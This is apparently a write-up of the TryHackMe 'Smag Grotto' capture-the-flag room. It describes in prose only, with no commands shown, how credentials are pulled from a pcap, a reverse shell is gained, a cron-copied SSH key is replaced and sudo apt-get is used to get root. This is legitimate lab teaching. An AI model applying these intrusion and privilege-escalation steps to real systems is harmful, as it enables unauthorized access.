Smag Grotto

https://tryhackme.com/room/smaggrotto

User Flag

As usually let's start with an nmap scan.

We see there are just two open ports. Let's head to port 80.

Nothing interesting at sight. Let's try dirsearch.

A /mail/ directory. That could be something. Let's check it.

We see there's a pcap file attached to one of the mails. We can download and see if there's anything useful there.

Using wget:

Fire up wireshark and let's see what we find.

Now, that's something. We found a domain and credentials. Add development.smag.thm to your hosts file.

Let's check the domain.

We can go to the login and try to access with the credentials we found before.

Nice. Now we can try to get a rev shell using a basic command.

That was easy, no filtering and no need to bypass.

The user flag is in Jake's home folder and we don't have access so we have to find a way to get inside.

The cronjob is copying the ssh backup to the .ssh folder in Jake's home directory. So now we have to generate a ssh key and try to replace it.

We have writing permissions on the jakeidrsa.pub.backup file. Let's edit it with our own ssh key.

Once we save the file with the new ssh we have to wait a minute to be able to ssh into the machine.

Grab the flag.

Root Flag

Using the sudo -l command we can use the apt-get command using sudo.

If we check GTFObins we can see there's a pretty easy way to privesc.